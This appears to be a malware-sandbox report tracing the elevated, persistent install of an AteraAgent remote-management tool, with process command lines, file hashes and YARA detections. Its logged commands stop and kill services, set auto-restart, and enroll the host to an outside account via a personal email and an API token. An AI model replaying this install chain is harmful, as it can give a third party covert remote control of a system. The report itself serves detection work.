                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:rundll32.exe "C:\Windows\Installer\MSIB4E8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5027093 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
                                                                                                                                                                                                                                        Imagebase:0xbe0000
                                                                                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000007.00000003.1363432071.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                        Start time:09:57:54
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 0C14E813FE9B8F63433BCCF076E5DD5E E Global\MSI0000
                                                                                                                                                                                                                                        Imagebase:0x330000
                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                        Start time:09:57:54
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"NET" STOP AteraAgent
                                                                                                                                                                                                                                        Imagebase:0x8a0000
                                                                                                                                                                                                                                        File size:47'104 bytes
                                                                                                                                                                                                                                        MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                        Start time:09:57:54
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                        Start time:09:57:54
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\net1 STOP AteraAgent
                                                                                                                                                                                                                                        Imagebase:0xd00000
                                                                                                                                                                                                                                        File size:139'776 bytes
                                                                                                                                                                                                                                        MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                        Start time:09:57:55
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"TaskKill.exe" /f /im AteraAgent.exe
                                                                                                                                                                                                                                        Imagebase:0xf00000
                                                                                                                                                                                                                                        File size:74'240 bytes
                                                                                                                                                                                                                                        MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                        Start time:09:57:55
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                        Start time:09:57:56
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="barrostransportes2018@gmail.com" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000MHGA9IAP" /AgentId="3757c761-9e50-4f15-8086-0e584dceea48"
                                                                                                                                                                                                                                        Imagebase:0x1e726670000
                                                                                                                                                                                                                                        File size:145'968 bytes
                                                                                                                                                                                                                                        MD5 hash:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.1446510712.000001E726790000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.1447302960.000001E728554000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.1452025510.00007FFB23B20000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.1447302960.000001E7285D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.1447302960.000001E7284A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.1451095737.00007FFAAB5F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.1447302960.000001E72861C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.1450020541.000001E740DE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.1447302960.000001E728569000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.1447302960.000001E72855A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000000.1397150472.000001E726672000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.1447005900.000001E726B10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.1446510712.000001E7267D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.1447302960.000001E7285D2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.1446510712.000001E72681A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.1447302960.000001E728552000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.1447302960.000001E728606000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.1447302960.000001E72852C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.1447302960.000001E728529000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000E.00000002.1450070040.000001E740FDF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 26%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                        Start time:09:58:00
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                                                                                                                                                                                                                        Imagebase:0x23476510000
                                                                                                                                                                                                                                        File size:145'968 bytes
                                                                                                                                                                                                                                        MD5 hash:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.000002340062A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1900882961.0000007E067C5000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.0000023400341000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1922183275.0000023477BCC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.00000234004D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1916974804.00000234765F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.00000234002A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.00000234003F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.0000023400339000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.00000234001D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1922183275.0000023477B9F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.000002340006F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1920033330.0000023477585000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.00000234005EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1916974804.00000234765D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.0000023400001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.00000234002CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1925477451.0000023477EF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.000002340039A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1916974804.00000234765D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1916974804.000002347668E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.00000234007B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.00000234007AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.0000023400398000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.00000234006B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1919102536.0000023476820000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.000002340032E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1916873070.00000234765C0000.00000004.00000020.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1922183275.0000023477B00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.000002340063A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.0000023400618000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.0000023400440000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1916974804.0000023476656000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1922183275.0000023477B52000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.00000234002D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1922183275.0000023477B7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1920033330.000002347761B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1916974804.000002347660D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1941036386.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1903414217.0000023400239000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                                        Start time:09:58:01
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                                                                                                                                                                                                                        Imagebase:0x7ff6be5f0000
                                                                                                                                                                                                                                        File size:72'192 bytes
                                                                                                                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                                        Start time:09:58:01
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                                        Start time:09:58:01
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:rundll32.exe "C:\Windows\Installer\MSID8C1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5036234 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
                                                                                                                                                                                                                                        Imagebase:0xbe0000
                                                                                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000013.00000002.1507886552.0000000005244000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000013.00000002.1507886552.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000013.00000003.1454376073.0000000004FE9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                                        Start time:11:19:43
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "c0a02000-d8db-4c72-a990-e7e78fb2c44b" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x1fd40e70000
                                                                                                                                                                                                                                        File size:177'712 bytes
                                                                                                                                                                                                                                        MD5 hash:31DEF444E6135301EA3C38A985341837
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1581326542.000001FD4113C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1582681527.000001FD419F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1596125589.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1581326542.000001FD410F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1581953324.000001FD41290000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1585649904.000001FD5A030000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1582681527.000001FD41971000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1581326542.000001FD410F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000000.1557171190.000001FD40E72000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1581326542.000001FD410B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1582681527.000001FD41A2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1585649904.000001FD5A0F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1582681527.000001FD419E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.1582681527.000001FD419B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
